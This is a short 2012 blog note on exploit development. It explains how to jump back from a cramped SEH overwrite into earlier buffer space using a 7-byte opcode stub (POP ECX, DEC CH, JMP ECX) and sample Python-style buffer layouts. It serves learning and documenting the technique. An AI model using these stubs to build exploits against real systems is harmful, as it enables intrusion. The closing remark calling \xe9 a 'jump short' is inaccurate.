Saturday, March 17, 2012

Limited Shellcode Space (SEH based BOF example)

Just as a quick note if i meet this situation again. During the creation of the exploits, and i want to put a shellcode and the space would not enough (e.g below 20 bytes), but there is still a space in front of the buffer (before address that overwrite SE handler) for example in seh based buffer overflow:

junk1= 'A'*500
junk2=  'A'*12
buffy=  junk1 + nseh + seh + '\x90'*8 + junk2

So, we need to jump back at least before the shellcode, for example our shellcode are 200 bytes, the buffer will be

buffy =  'A'*300 + shellcode + nseh + seh +  '\x90'*8 + junk2

we need to jump back at least 220 bytes, to land in junk1, so we need 'junk2' to make us Jump back. to do this we can use decrement CH register (1 = 256 bytes decrease from ECX), but before doing that after we doing POP, POP, RETN the pointer three places down in the stack, to get this memory address to ECX register, we need to do POP ECX, POP ECX, POP ECX, after that Jump to ECX and it will moves back 256 from the original POP, POP, RETN instructions land.

So, here what we are doing

POP ECX \x59
POP ECX \x59
POP ECX \x59
DEC CH \xfe\xcd
JMP ECX \xff\xe1

and the shellcode/payload for junk2 only 7 bytes long ("\x59\x59\x59\xfe\xcd\xff\xe1"), so the buffer will go 

buffy =  'A'*300 + shellcode + nseh + seh +  '\x90'*13 + "\x59\x59\x59\xfe\xcd\xff\xe1"


* if you need approx 512 (dec CH twice)

** i guess i never write about buffer overflow before, because there are so many great article about buffer overflow in other sites, but for this one i found it so rare.

*** or u could use egg-hunting or use jump short (\xe9) 

No comments:

Post a Comment